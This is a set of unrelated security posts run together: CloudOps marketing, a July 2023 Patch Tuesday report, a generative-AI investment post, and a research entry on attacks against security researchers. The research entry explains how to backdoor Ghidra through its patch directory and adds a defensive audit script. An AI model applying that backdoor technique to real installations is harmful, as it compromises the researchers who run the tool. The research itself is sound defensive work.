Getting More From Cloud | How to Maximize Business Value Through CloudOps Services

With more businesses relying on cloud computing to streamline operations and improve scalability, enterprise leaders are adopting a cloud-first approach, combining network, performance, security, endpoint management, and support all through cloud operations, or CloudOps. CloudOps combines both IT processes and DevOps principles to ensure the smooth operation, maintenance, and optimization of a cloud-based infrastructure and its applications.

As data breaches increasingly occupy news headlines and new security vulnerabilities pose significant risks to businesses, CloudOps has emerged as a crucial component for ensuring the safety and integrity of cloud-based systems. In this post, learn to build and automate a strong cloud-first strategy that can help keep organizations of all sizes safe from potential cloud security risks.

Emerging CloudOps | The Next Phase of Digital Business

According to Gartner, global end-user spending on public cloud services is forecast to grow nearly 22% to a total of $597.3 billion this year. Given its prevalence, security experts view the cloud as the driving force behind the next phase of digital business, owing to its role as a highly strategic platform for digital transformation and services.

While cloud usage is near universal in the modern business landscape, many deployments remain poorly architected or are assembled ad hoc. Digital trends for 2023 indicate that cloud infrastructure optimization is one of the top priorities to pay attention to. The rise of cloud is clear and enterprise leaders are working to evolve their IT, engineering and development teams to build the right cloud security management and operating strategies for their business. This is where CloudOps comes into play.

CloudOps focuses on managing and optimizing cloud-based infrastructure, applications, and services. It takes into account the unique characteristics and capabilities of cloud computing, such as elasticity, scalability, and resource virtualization.

Many businesses have relied on traditional IT operations (ITOps) practices to manage their cloud deployments. However, as the complexity of cloud infrastructure has grown, forward-thinking enterprises have moved towards specialized expertise and dedicated processes to better handle their cloud-first systems.

CloudOps combines principles from other operational models such as ITOps and DevOps and makes them applicable to a cloud-based architecture. These principles, processes, and best practices help security teams across cloud architecture, security, compliance, and IT operations to manage the overarching infrastructure. Below are some key differences that make CloudOps unique.

  • Managing & Optimizing Cloud – CloudOps focuses specifically on managing and optimizing cloud-based infrastructure, applications, and services. It takes into account the unique characteristics and capabilities of cloud computing, such as elasticity, scalability, and resource virtualization.
  • Underlying Infrastructure – While IT operations primarily deal with physical hardware and data centers, CloudOps is centered around virtualized resources and cloud service providers.
  • Security – Since cloud environments have unique security considerations, CloudOps focuses on implementing robust security measures, such as identity and access management, data encryption, and proactive threat monitoring, all specific to cloud-based systems.
  • Scalability – CloudOps offers greater flexibility compared to traditional IT operations. Cloud environments allow businesses to scale resources up or down based on demand, whereas scaling in traditional IT operations often requires additional hardware procurement and deployment.
  • Automation – CloudOps leverages automation tools and frameworks to streamline resource provisioning, configuration management, and application deployment in the cloud. This level of automation is typically more advanced and efficient compared to traditional IT operations.

Seizing Value Through CloudOps Services

As cloud technology continues to meet changing business needs, migrating from on-prem to the cloud is no longer enough to revolutionize business infrastructure. The rise of hybrid and multi-cloud structures has also multiplied the complexities and criticalities associated with the cloud.

To leverage more value from the cloud, enterprises have focused on driving cost efficiencies through shared services and flexible commercial models. Cloud-based Infrastructure-as-a-Service (IaaS), for example, plays a pivotal role in maintaining superior functionality and operational agility through automation, enabling businesses to optimize their operations.

In this context, CloudOps services have gained significant momentum. By managing software in a cloud computing environment, CloudOps ensures that enterprises are effectively harnessing the benefits of cloud-based systems. Since cloud operations services focus on optimizing performance and capacity, they validate best practices and processes that enable cloud platforms, applications, and internal data to perform optimally.

Increase Efficiency & Scalability

CloudOps optimizes resource utilization and reduces manual intervention, resulting in enhanced operational efficiency. With proactive monitoring and performance optimization, CloudOps teams can identify and resolve issues promptly, minimizing downtime and maximizing productivity.

CloudOps also enables scalability. When businesses scale their resources up or down based on demand, ensuring optimal performance without unnecessary resource allocation is key. By centralizing management and leveraging standardized practices, CloudOps streamlines operations, reduces complexity, and empowers organizations to focus on core business activities.

Cost Optimization

Cost optimization is a significant advantage of implementing CloudOps within organizations. CloudOps teams leverage automation, monitoring tools, and advanced analytics to optimize resource allocation and usage. Over time, security teams see cost savings as they continue to monitor resource consumption and apply scaling strategies based on demand. CloudOps also ensures that resources are provisioned efficiently, avoiding unnecessary expenses.

Improved Security

CloudOps plays a critical role in an enterprise’s cybersecurity strategy, keeping business-critical data safe from cloud-based security threats. CloudOps focuses on implementing robust security measures to protect sensitive data and on ensuring the integrity of cloud-based systems. To do so, security teams continuously monitor the cloud environment for vulnerabilities, proactively detect and mitigate security risks, and ensure compliance with industry regulations.

CloudOps employs various strategies and practices to secure a cloud environment effectively including:

  • Identity and Access Management (IAM) – CloudOps implements robust IAM policies to manage user identities, roles, and access privileges. This ensures that only authorized individuals can access and modify resources within the cloud environment.
  • Encryption – CloudOps utilizes encryption techniques to protect data at rest and in transit. Encryption safeguards sensitive information from unauthorized access, even if a breach occurs.
  • Regular Security Audits – CloudOps teams conduct regular security audits to identify vulnerabilities and weaknesses in the cloud infrastructure. This allows them to proactively address potential security gaps and implement necessary patches or updates.
  • Network Security – CloudOps implements network security measures such as firewalls, intrusion detection systems, and virtual private networks (VPNs) to monitor and protect the cloud environment from unauthorized access and malicious activities.
  • Incident Response Planning – CloudOps develops and maintains robust incident response plans to effectively handle security incidents. This includes defining escalation procedures, conducting drills, and implementing measures to minimize the impact of potential security breaches.
  • Compliance Management – CloudOps ensures compliance with industry-specific regulations and standards. This involves implementing controls and processes to meet data privacy requirements and maintain regulatory compliance.
  • Ongoing Monitoring and Threat Detection – CloudOps teams continuously monitor the cloud environment, employing advanced monitoring tools and technologies to detect and respond to potential security threats promptly. This includes real-time monitoring of logs, network traffic, and system activities.

Operating In The Cloud | How To Effectively Implement CloudOps

CloudOps enables organizations to focus on their core competencies by streamlining the management of their cloud environments. Security teams can follow the below key steps when implementing CloudOps best practices.

Define Your Cloud Strategy & Objectives

Begin by assessing the existing IT infrastructure, applications, and business processes. Understand the strengths, weaknesses, and limitations of the current environment, as well as all business drivers for adopting cloud technology.

Then, clearly define the objectives and expected outcomes of implementing CloudOps within the organization. Determine the specific areas of focus such as efficiency, scalability, security, or cost optimization. These definitions allow senior leadership to tie the cloud strategy to business goals and narrow down specific requirements when selecting the right cloud service provider.

Design CloudOps Processes

It is also important to develop clear processes for CloudOps that align with the organization’s goals. This can include defining resource provisioning and configuration management procedures, performance monitoring, incident response protocols, and security practices.

Implement Automation and Orchestration

Automation helps the organization to scale and grow. Teams providing CloudOps services can leverage automation and orchestration tools effectively to streamline resource provisioning, configuration, and deployment processes.

Automation increases efficiency and minimizes the risk of human error. Further, automating the provisioning and de-provisioning of cloud resources enables the organization to be more agile in the face of changing business requirements.

Leverage Infrastructure as Code (IaC)

In CloudOps, Infrastructure as Code (IaC) enables the management and provisioning of cloud infrastructure using code-based configurations. With IaC, CloudOps teams can define the desired state of the cloud infrastructure, including virtual machines, networks, storage, security settings, and other resources, using code or configuration files. This code serves as a blueprint that specifies how the infrastructure should be provisioned and configured.

By treating infrastructure as code, CloudOps practitioners can leverage version control systems to track changes, perform code reviews, and collaborate effectively. This ensures consistency and repeatability across deployments and simplifies the process of managing complex cloud environments. IaC allows for rapid infrastructure deployment and scaling, as code-based configurations can be easily replicated and applied across multiple environments.

Establish Continuous Integration & Deployment (CI/CD)

Continuous Integration and Deployment (CI/CD) focuses on automating and streamlining the software development and deployment processes within a cloud environment. Within the CloudOps framework, CI/CD pipelines can be configured to trigger automatically whenever code changes are committed to the repository. These pipelines perform a series of predefined actions, such as code compilation, testing, vulnerability scanning, and packaging. Once the code passes all the necessary tests and checks, it is deployed to the cloud environment, making it available to end-users.

This enables security teams to accelerate the delivery of software updates while maintaining high quality and reducing the risk of deployment failures. CI/CD also promotes collaboration among development, operations, and testing teams, facilitates rapid feedback cycles, and enables teams to respond quickly to changing business requirements and customer needs.

Monitor For Optimal Performance

Performance monitoring in CloudOps involves the continuous monitoring and analysis of the cloud environment to assess the performance of various resources and applications. It helps ensure optimal performance, identify potential bottlenecks or issues, and take proactive measures to maintain a high level of efficiency. CloudOps teams typically monitor for the following key areas:

  • Resources – Monitoring for cloud resources such as virtual machines, databases, storage, and network components. Monitoring metrics like CPU usage, memory utilization, network traffic, and disk I/O helps identify resource-intensive processes or potential performance degradation.
  • Application performance – Monitor the performance of applications running in the cloud environment. This involves tracking response times, latency, throughput, and error rates to identify any performance issues or anomalies.
  • Scalability – Assess the capacity of the cloud environment to handle increased workloads. Determine if the resources can scale dynamically to meet demand and identify potential limitations or constraints that may impact performance during peak periods.
  • Alerts, notifications, and historical data – Performance monitoring tools generate alerts and notifications based on predefined thresholds or anomalies. This enables CloudOps teams to receive real-time alerts about performance issues and take immediate action to mitigate potential problems. These tools also collect data over time, allowing for historical analysis and reporting. Teams can use this data to identify trends and performance patterns, enabling those responsible for providing CloudOps services to make informed decisions about resource optimization, capacity planning, and performance improvements.

Singularity Cloud | SentinelOne’s Strategy for Securing the Cloud

SentinelOne enables organizations to protect their endpoints across all cloud environments, public, private, and hybrid, through Singularity™ Cloud. With thousands of accounts spread across multiple clouds, organizations need the right security in place for their cloud infrastructure. Singularity Cloud works by extending distributed, autonomous endpoint protection, detection, and response to compute workloads running in both public and private clouds, as well as on-prem data centers.

  • Enterprise-Grade EPP & EDR – Get full endpoint detection and response as well as container coverage in one SentinelOne agent. Singularity™ Cloud allows for complete container visibility with one agent per node and without pod instrumentation.
  • Enterprise Management & Deployment – Choose to auto-deploy Kubernetes Sentinel Agent, a component of Singularity™ Cloud to EKS, AKS, and GKE clusters, or Linux and Windows Server Sentinel Agents to AWS EC2, Azure VM, and Google Compute Engine.
  • AI-Powered Cloud Workload Protection – Behavioral AI detects unknown threats such as zero-day exploits and indicators of compromise consistent with novel ransomware and then quarantines them in real-time. Singularity Cloud protects runtime containers without container interference for Linux, Windows servers, and VMs.

Conclusion

The scalability and flexibility offered by the cloud come with inherent complexities. CloudOps addresses these challenges by providing organizations with the necessary tools and processes to monitor, manage, and optimize their cloud infrastructure. It enables businesses to streamline operations, reduce costs, and improve resource utilization while ensuring high availability and performance.

As businesses rapidly embrace cloud technology to drive innovation and scalability, leaders are prioritizing CloudOps implementation for its effective management of cloud environments. CloudOps brings a holistic approach to cloud management, combining technical expertise, automation, and best practices to optimize performance and build a long-term security posture.

As cloud technology continues to evolve, CloudOps keeps pace with the latest advancements. It embraces emerging technologies such as serverless computing, containerization, and artificial intelligence to drive innovation and unlock new possibilities. CloudOps also enables organizations to adapt quickly to changing business needs and leverage the full potential of cloud services.

SentinelOne can help organizations improve their cloud security strategy through a combination of endpoint detection and response (EDR) capability, autonomous threat hunting, and runtime solutions that can defeat cloud-based threats without compromising agility or availability. Learn more about Singularity™ Cloud by contacting us for a demo.


Apple & Microsoft Patch Tuesday, July 2023 Edition

Microsoft Corp. today released software updates to quash 130 security bugs in its Windows operating systems and related software, including at least five flaws that are already seeing active exploitation. Meanwhile, Apple customers have their own zero-day woes again this month: On Monday, Apple issued (and then quickly pulled) an emergency update to fix a zero-day vulnerability that is being exploited on MacOS and iOS devices.

On July 10, Apple pushed a “Rapid Security Response” update to fix a code execution flaw in the Webkit browser component built into iOS, iPadOS, and macOS Ventura. Almost as soon as the patch went out, Apple pulled the software because it was reportedly causing problems loading certain websites. MacRumors says Apple will likely re-release the patches when the glitches have been addressed.

Launched in May, Apple’s Rapid Security Response updates are designed to address time-sensitive vulnerabilities, and this is the second month Apple has used it. July marks the sixth month this year that Apple has released updates for zero-day vulnerabilities — those that get exploited by malware or malcontents before there is an official patch available.

If you rely on Apple devices and don’t have automatic updates enabled, please take a moment to check the patch status of your various iDevices. The latest security update that includes the fix for the zero-day bug should be available in iOS/iPadOS 16.5.1, macOS 13.4.1, and Safari 16.5.2.

On the Windows side, there are at least four vulnerabilities patched this month that earned high CVSS (badness) scores and that are already being exploited in active attacks, according to Microsoft. They include CVE-2023-32049, a hole in Windows SmartScreen that lets malware bypass security warning prompts; and CVE-2023-35311, which allows attackers to bypass security features in Microsoft Outlook.

The two other zero-day threats this month for Windows are both privilege escalation flaws. CVE-2023-32046 affects a core Windows component called MSHTML, which is used by Windows and other applications, like Office, Outlook and Skype. CVE-2023-36874 is an elevation of privilege bug in the Windows Error Reporting Service.

Many security experts expected Microsoft to address a fifth zero-day flaw — CVE-2023-36884 — a remote code execution weakness in Office and Windows.

“Surprisingly, there is no patch yet for one of the five zero-day vulnerabilities,” said Adam Barnett, lead software engineer at Rapid7. “Microsoft is actively investigating the publicly disclosed vulnerability, and promises to update the advisory as soon as further guidance is available.”

Barnett notes that Microsoft links exploitation of this vulnerability with Storm-0978, the software giant’s name for a cybercriminal group based out of Russia that is identified by the broader security community as RomCom.

“Exploitation of CVE-2023-36884 may lead to installation of the eponymous RomCom trojan or other malware,” Barnett said. “[Microsoft] suggests that RomCom / Storm-0978 is operating in support of Russian intelligence operations. The same threat actor has also been associated with ransomware attacks targeting a wide array of victims.”

Microsoft’s advisory on CVE-2023-36884 is pretty sparse, but it does include a Windows registry hack that should help mitigate attacks on this vulnerability. Microsoft has also published a blog post about phishing campaigns tied to Storm-0978 and to the exploitation of this flaw.

Barnett said that while it’s possible a patch will be issued as part of next month’s Patch Tuesday, Microsoft Office is deployed just about everywhere, and this threat actor is making waves.

“Admins should be ready for an out-of-cycle security update for CVE-2023-36884,” he said.

Microsoft also today released new details about how it plans to address the existential threat of malware that is cryptographically signed by…wait for it….Microsoft.

In late 2022, security experts at Sophos, Trend Micro and Cisco warned that ransomware criminals were using signed, malicious drivers in an attempt to evade antivirus and endpoint detection and response (EDR) tools.

In a blog post today, Sophos’s Andrew Brandt wrote that Sophos identified 133 malicious Windows driver files that were digitally signed since April 2021, and found 100 of those were actually signed by Microsoft. Microsoft said today it is taking steps to ensure those malicious driver files can no longer run on Windows computers.

As KrebsOnSecurity noted in last month’s story on malware signing-as-a-service, code-signing certificates are supposed to help authenticate the identity of software publishers, and provide cryptographic assurance that a signed piece of software has not been altered or tampered with. Both of these qualities make stolen or ill-gotten code-signing certificates attractive to cybercriminal groups, who prize their ability to add stealth and longevity to malicious software.

Dan Goodin at Ars Technica contends that whatever Microsoft may be doing to keep maliciously signed drivers from running on Windows is being bypassed by hackers using open source software that is popular with video game cheaters.

“The software comes in the form of two software tools that are available on GitHub,” Goodin explained. “Cheaters use them to digitally sign malicious system drivers so they can modify video games in ways that give the player an unfair advantage. The drivers clear the considerable hurdle required for the cheat code to run inside the Windows kernel, the fortified layer of the operating system reserved for the most critical and sensitive functions.”

Meanwhile, researchers at Cisco’s Talos security team found multiple Chinese-speaking threat groups have repurposed the tools—one apparently called “HookSignTool” and the other “FuckCertVerifyTimeValidity.”

“Instead of using the kernel access for cheating, the threat actors use it to give their malware capabilities it wouldn’t otherwise have,” Goodin said.

For a closer look at the patches released by Microsoft today, check out the always-thorough Patch Tuesday roundup from the SANS Internet Storm Center. And it’s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: AskWoody.com usually has the lowdown on any patches that may be causing problems for Windows users.

And as ever, please consider backing up your system or at least your important documents and data before applying system updates. If you encounter any problems with these updates, please drop a note about it here in the comments.

What It Takes to be a Top Gun | GenAI & Cybersecurity

We believe that generative AI has the potential to generate massive value and disrupt existing industries and applications. We are now witnessing generative AI accomplish things on a daily basis that just a short time ago did not seem possible.

Generative AI has a meaningful role to play in cybersecurity, both for the good guys and the bad ones. Our motto at SentinelOne has been to be a “Force for Good”, and we intend to be a Force for Good in bringing advanced AI capabilities into cybersecurity as well.

At SentinelOne, AI has always been at the core of what we do – many years ago we introduced static AI detection models as part of our endpoint security platform that vastly improved the ability to detect potential threats versus the previous signature based approaches used in the market up to that point. At RSA 2023, we showcased the power of using generative AI in cyber with our introduction of Purple AI, which turns every security analyst into a super analyst. Purple AI significantly increases analyst productivity by reducing layers of complexity needed in generating insights and automating their ability to take action on threats and other issues surfaced via Purple.

Cybersecurity has a jobs issue: there are simply not enough trained cybersecurity professionals to meet the needs in the market – professionals who are trained to protect your favorite application, service, financial institution, utility, etc. Thus generative AI is just what cybersecurity needs – a force multiplier for security experts, for those on the good side of the equation.

What Have We Learned about Generative AI and Cybersecurity?

So what have we learned about generative AI and cybersecurity? We’ve said before that security is a data problem, and as it turns out, generative AI is ultimately a data problem as well. ChatGPT amazed the world because it provided a highly human compatible interface to the internet’s endless catalog of data. Since then we’ve seen many companies introduce “co-pilots” on top of their existing applications in many sectors – security, CRM, content creation, HR, etc.

The rapid adoption of Generative AI and LLMs technologies brings unique challenges and opportunities to the security space that will be felt in different ways than in other segments. In particular, at the same time that security analysts are gaining access to these productivity/force-multiplying tools, so are hackers and bad actors, which will in time allow them to create and execute attacks like never before. This will make it even more critical for companies to understand and adopt their own AI-based security strategy, in order to thwart a more sophisticated generation of attacks they are likely to see in the not-too-distant future.

Today’s co-pilot AI guides often use a combination of models – from open source, independent commercial LLMs, plus a vendor’s own proprietary models. These proprietary models can be tuned and trained by data specific to that vendor, often data that is gathered by the products and services it currently offers. The tuning and training performed on this data is what makes these models relevant and functional within a particular practice. The co-pilot approaches that ultimately graduate to being a Top Gun solution in their space will bring something truly transformative to their segment.

SentinelOne believes that transformational opportunities for generative AI will be driven by offerings that leverage a corpus of data that go well beyond a single vendor’s product and span an entire area or set of areas. After all, the data and information that defines a process or practice within an industry often spans multiple products.

For example, within security, it is not uncommon for an enterprise to be using between 50-100 different security tools. Today these tools define the customer’s security strategy, operations and collectively house the majority of data relative to this. GenAI’s ability to transform cybersecurity will depend in part on utilizing as much of this data as possible to introduce new capabilities never possible within a single set of tools.

Our goal with Purple AI is to do just that: provide enterprises a way to leverage the vast amount of security data spread across their security tools to create a new superpower against the evolving threat landscape, made possible through our Singularity Security DataLake.

How Does S Ventures Fit In?

So how does S Ventures fit in? We believe generative AI will give rise to an entirely new tech stack, spanning core infrastructure, tools and services, and applications. LLMs will form a foundational component of the core infrastructure stack. Given the rarity of talent, the funding requirements (for training and tuning new models) and the ability to execute, there will be a handful of players that can build a business around LLMs, perhaps most analogous to the emergence of AWS, GCP and Azure during the cloud era.

While many of these same players are also highly relevant in generative AI and LLMs today, many enterprise customers have a strong desire to avoid vendor lock-in and for a best of breed independent vendor that can cater to its specific business needs. These customers will want to establish their own unique value proposition with AI and will care about items such as customization, privacy, security, explainability and trust.

While some – particularly smaller and mid-sized customers – may be able to utilize off the shelf models, many larger customers will need more highly custom / configured models tuned for their environment. Customers may also require an enterprise level of support or engagement from their LLM provider, while others may have the sophistication to train and tune a combination of commercial and proprietary models themselves. Like in the previous cloud era, we believe both commercial and open source models will coexist alongside each other.

S Ventures is focused on actively investing in the generative AI ecosystem. Within the LLM area, we intend to invest in a select number of independent providers that hold the most promise for bringing the transformative potential of AI to the enterprise.

As part of this we are excited about our recent investment in Cohere, a leading LLM provider. Cohere has a mission – to help enterprises adopt generative AI through the use of LLMs. The company has proven its ability to deliver top performing models. It has a world class technical team that includes experts who came from Google Brain, DeepMind and Meta, as well as a great business team (including former operational execs from some of the largest tech companies in the world such as Google, Amazon, Apple, and Cisco) to help execute on its enterprise strategy.

Cohere understands what enterprises need – customization, data security, quality, a cloud agnostic approach and ability to deploy both on-prem and in the cloud. Cohere’s recent partnership with Oracle is a great early example of this.

We are excited about our investment in Cohere and their strong position to be one of the winners in the generative AI space.

Analyzing Attack Opportunities Against Information Security Practitioners

In partnership with vx-underground, SentinelOne recently ran its first Malware Research Challenge, in which we asked researchers across the cybersecurity community to submit previously unpublished work to showcase their talents and bring their insights to a wider audience.

Today’s post is the second in a series highlighting the best entries. Jared Stroud (@DLL_Cool_J / Arch Cloud Labs) explores the risks faced by security researchers from attacks by APTs and other threat actors through compromise of security research tools. The study includes discussion of a novel attack vector through popular open-source reverse engineering platform, Ghidra.

Background

Attacks against the Information Security research community have historically ranged from fake proof-of-concept GitHub repos to modified Visual Studio project data resulting in the execution of PowerShell commands. In recent years threat actors have begun targeting software heavily used within the Information Security community. Observed targeting techniques include directly selecting individuals in the security research community through phishing campaigns, or casting a wider opportunistic net by seeding illegal software torrents. As an industry, our circles of trust create an environment where the attack surface of security practitioners is unique and wider than one may think.

Sophisticated attacks focus on those who provide the most value to the Information Security community through blog posts, YouTube channels, and other forms of information sharing. This article explores some of these historical attacks, identifies the attack surface of a researcher's toolkit, and outlines defensive strategies the community can apply against such attacks.

Historical Targeted Attacks Against Software Used by Security Practitioners

Security Company ESET reported in 2021 that threat actors linked to DPRK backdoored IDA Pro torrents via malicious DLLs within the installation folder of IDA Pro. Arch Cloud Labs does not condone the use of pirated software, but it is likely this software was chosen due to the probability of discovering additional security research on a victim’s machine. After all, why choose IDA Pro? Other actors have backdoored popular resource-intensive video game torrents to make use of GPUs for Cryptojacking campaigns. Per ESET’s tweets, upon launching IDA Pro, a scheduled task is created which downloads an additional DLL by the name of IDA Helper to fetch and execute a remotely hosted payload for follow-on post-exploitation activity.

Abusing DLL hijacking opportunities within Windows software is nothing new; what stands out is the threat actor's intent to focus on the individuals who use IDA Pro, such as security researchers. By targeting torrented software, the threat actor also gains a measure of cover: even if an endpoint security product flags the software as malicious, a victim who downloaded it illegally will likely assume the alert has something to do with the torrent or the associated crack, and certainly not that they have been targeted by a nation-state adversary.

In 2022, Google's Threat Analysis Group (TAG) reported a targeted phishing campaign focusing on security researchers, under the guise of asking known security researchers to help the attacker finalize a proof-of-concept exploit. This proof-of-concept exploit was ultimately a Visual Studio project that executed a PowerShell command to aid in exfiltrating data from a security researcher's lab environment. Numerous individuals on Twitter came forward saying they had established contact with puppet accounts that were requesting help.

Those who seek to mentor and help one another in this industry should be applauded for their efforts, but should also be wary of how this can be abused in elaborate phishing campaigns such as those reported by Google TAG. It is unlikely that these types of attacks will slow down in the coming years, and as security practitioners, understanding our tools of the trade and their associated attack surface is critical to protecting ourselves as well as our research. If one looks hard enough, ways to use a given reverse engineering or digital forensics tool for living-off-the-land style attacks can be found. Arch Cloud Labs analyzed how these types of attacks could be applied to other widely used software such as Ghidra to enable a threat actor to target members of the security community, and will demonstrate such an attack later in this article.

Opportunistic Attacks During a CVE Crisis

Academic researchers from Leiden University recently published a paper stating that 10% of proof-of-concept exploit repos on GitHub contain code meant to exfiltrate sensitive data from the targeted environment. If a researcher's VM is not appropriately air-gapped or isolated to an individual project, the opportunity for sensitive data loss exists. During moments of crisis such as a high-impact vulnerability (Ex: unauthenticated RCE), defenders seek to quickly understand, assess and remediate the potential impact a given vulnerability may have on their organization. This leads to researchers publishing proof-of-concept (PoC) code on GitHub for use by the wider community.

As defenders rush to GitHub, this creates a "watering hole" attack scenario where independent or otherwise unknown researchers have the opportunity to name a GitHub repo "PoC CVE-XXXX-XXXX" to capture incoming traffic for the latest vulnerability. In 2020, Andy Gill demonstrated a perfect example of this by creating a GitHub repo with a bash script that would Rick Roll security researchers.

When seeking to identify whether or not a GitHub repo is trustworthy, how do you or your research colleagues determine this? Do you audit the code, or simply look at the number of stars a repo has and think "this is probably fine"? The concept of trust in PoC exploitation is unique to the Information Security arena: outside of commercial or well-known offensive frameworks, how often is malicious software intentionally executed in your corporate environment? Ideally never, but a framework or risk matrix for assessing a proof-of-concept's legitimacy is an area that the industry has yet to fully explore.

Identifying Attack Surface of Researcher’s Tools: Case Study Ghidra

Complex software such as Visual Studio or IDA Pro contains numerous ways to achieve code execution. Understanding the tool and how its functionality can be abused is critical to understanding the paths an adversary could take to compromise research environments.

Fundamentally, treating the file formats and complex archives of build systems as ways to "live off the land", much like LOLBINs, can lead to exciting new discoveries. Today, Arch Cloud Labs is demonstrating how Ghidra, a popular reverse engineering tool released by the National Security Agency, could be leveraged for abuse in a similar vein to IDA Pro.

Ghidra versions are regularly released as zip files under the releases tab of the official GitHub repo here. To backdoor Ghidra, one simply needs to place a Java .jar file containing a class with the same name as an existing Ghidra class in the ./Ghidra/patch directory of the zip file, and that class's functionality will be overridden. Per the README within the Ghidra patch directory:

> This directory exists so that Ghidra releases can be patched, or overridden. Classes or jar files placed in this directory will be found and loaded *before* the classes that exist in the release jar files. One exception is that classes in the Utility module can not be patched in this way. The jar files will be sorted by name before being prepended to the classpath in order to have predictable class loading between Ghidra runs. This patch directory will be the very first patch entry on the classpath such that any individual classes will be found before classes in any of the patch jar files. The class files in this directory must be in the standard java package directory structure.

The patch directory provides the adversary a unique and low-effort opportunity to ship a zip archive to an unsuspecting researcher as a part of a phishing campaign or have a second-stage payload drop additional payloads to the patch directory. To be clear, this is not an exploit but rather abusing default functionality within the Ghidra tool.

When a new version of Ghidra is launched for the first time on a machine, if no entry for it exists in the .ghidra folder within the user's home directory, a user agreement followed by the Help menu is displayed by default. By identifying which Java classes are called (Ex: Help.java), this default behavior can be abused to have code load and execute in a guaranteed fashion if the version number of the Ghidra build in the zip file is set to a non-existent build number (ex: build id 9999.9999). This combination creates a unique opportunity for a phishing campaign. The workflow is visualized below.

Ghidra attack flow

This modified Help.java file shown below contains a simple proof-of-concept modification to echo “pwn” to /tmp/pwn.txt.

Modified Help.java

After modifying the Java file and completing the build steps outlined in the Ghidra build documentation, a malicious actor can take the compiled Jar, place it in the patch directory and ship it with a Ghidra release of their choice. Alternatively, in a post-exploitation scenario, this Jar can be placed as a means of persistence that triggers whenever Ghidra is launched. A more sophisticated payload is left as an exercise to the reader.

Protection Against Attacks and Validation of PoCs

Nothing listed below is groundbreaking or new, but these are practices not typically applied at the individual researcher level. After all, if these mechanisms are supposed to secure large enterprise organizations, why not apply them to the research community as well?

Starting with an assessment of the threat model for your research environment will enable you to make appropriate decisions about what additional steps need to be taken to protect yourself and your organization. Accidentally executing malware never results in a good day, and planning your environment and an associated disaster recovery plan for these events leads you to take steps to protect yourself. In addition to a disaster recovery plan for malware analysis environments, how can the community continuously check that the safeguards in place actually work? Just as the industry adopts continuous vulnerability scanning for containers, code, etc., auditing custom malware and offensive security research environments is critical as well.

Software bills of materials (SBOMs) have become commonplace when discussing the deployment of commercial software. The ability to map given versions of plugins and tools to their dependencies and hashes, in order to prevent abuse, can help the research community avoid malicious DLLs, JARs, plugins, etc. being placed in software distributions. As new C2 frameworks are consistently developed and adopt code from one another, the ability to track the provenance of where scripts are derived from will help prevent maliciously modified scripts from ending up on your test system, as well as provide a way to acknowledge the original author.
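As an added example (not code from the article or from the Ghidra project), the following Python script turns the patch-directory behavior described in the case study above and the hash-manifest idea in this paragraph into a defensive check: it lists everything in Ghidra/patch beyond the README, flags classes that shadow a class in a release jar, and diffs the distribution against a trusted manifest. The miniature Ghidra layout it audits is constructed in a temporary directory with dummy class bytes so it runs offline; the jar and class names used there are assumptions.

```python
from __future__ import annotations

import hashlib
import tempfile
import zipfile
from pathlib import Path

# A clean release ships only a README in Ghidra/patch; anything else deserves a look.
PATCH_ALLOWLIST = {"README.txt"}


def sha256_file(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def classes_in_jar(jar: Path) -> set[str]:
    """Class entries (package/Name.class) contained in a jar."""
    with zipfile.ZipFile(jar) as zf:
        return {n for n in zf.namelist() if n.endswith(".class")}


def release_class_index(root: Path) -> dict[str, str]:
    """Map every class in the release jars (outside Ghidra/patch) to its jar name."""
    index: dict[str, str] = {}
    for jar in (root / "Ghidra").rglob("*.jar"):
        if "patch" in jar.relative_to(root).parts:
            continue
        for cls in classes_in_jar(jar):
            index.setdefault(cls, jar.name)
    return index


def audit_patch_dir(root: Path) -> list[tuple[str, str, str | None]]:
    """Return (kind, patch_entry, shadowed_jar) findings for Ghidra/patch.

    kind is 'override' when a class in the patch dir shadows a release class
    (the README says patch entries load *before* release jars), 'new-class'
    when it adds a class the release lacks, and 'unexpected-file' otherwise.
    """
    findings: list[tuple[str, str, str | None]] = []
    patch = root / "Ghidra" / "patch"
    if not patch.is_dir():
        return findings
    index = release_class_index(root)
    for entry in sorted(p for p in patch.rglob("*") if p.is_file()):
        rel = entry.relative_to(patch).as_posix()
        if rel in PATCH_ALLOWLIST:
            continue
        if entry.suffix == ".jar":
            for cls in sorted(classes_in_jar(entry)):
                kind = "override" if cls in index else "new-class"
                findings.append((kind, f"{rel}!{cls}", index.get(cls)))
        elif entry.suffix == ".class":
            # Loose classes must use the package directory layout, e.g. help/Help.class
            kind = "override" if rel in index else "new-class"
            findings.append((kind, rel, index.get(rel)))
        else:
            findings.append(("unexpected-file", rel, None))
    return findings


def build_manifest(root: Path) -> dict[str, str]:
    """Constructed stand-in for an SBOM-style manifest: relative path -> sha256."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in root.rglob("*") if p.is_file()}


def verify_manifest(root: Path, manifest: dict[str, str]) -> list[tuple[str, str]]:
    """Files that are missing, modified, or not listed, compared with a trusted manifest."""
    current = build_manifest(root)
    problems = [("missing", rel) for rel in manifest if rel not in current]
    problems += [("modified", rel) for rel, h in manifest.items()
                 if rel in current and current[rel] != h]
    problems += [("unlisted", rel) for rel in current if rel not in manifest]
    return sorted(problems)


def _write_jar(path: Path, entries: dict[str, bytes]) -> None:
    path.parent.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(path, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)


def build_demo_install() -> tuple[Path, dict[str, str]]:
    """Constructed miniature Ghidra layout (dummy class bytes) plus its clean manifest."""
    root = Path(tempfile.mkdtemp(prefix="ghidra-audit-"))
    (root / "Ghidra" / "patch").mkdir(parents=True)
    (root / "Ghidra" / "patch" / "README.txt").write_text("patch dir\n")
    _write_jar(root / "Ghidra" / "Framework" / "Help" / "lib" / "Help.jar",
               {"help/Help.class": b"\xca\xfe\xba\xbe release"})
    clean = build_manifest(root)  # manifest taken before anything is planted
    # Plant the kind of jar the article describes: same class name, loaded first.
    _write_jar(root / "Ghidra" / "patch" / "zzz-helper.jar",
               {"help/Help.class": b"\xca\xfe\xba\xbe tampered"})
    return root, clean


if __name__ == "__main__":
    demo_root, clean_manifest = build_demo_install()
    for finding in audit_patch_dir(demo_root):
        print("patch audit:", finding)
    for problem in verify_manifest(demo_root, clean_manifest):
        print("manifest:", problem)
```

Run against a real unpacked release, `audit_patch_dir` should return nothing and `verify_manifest` should be empty when the manifest was taken from a distribution whose zip hash you verified against the release page.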

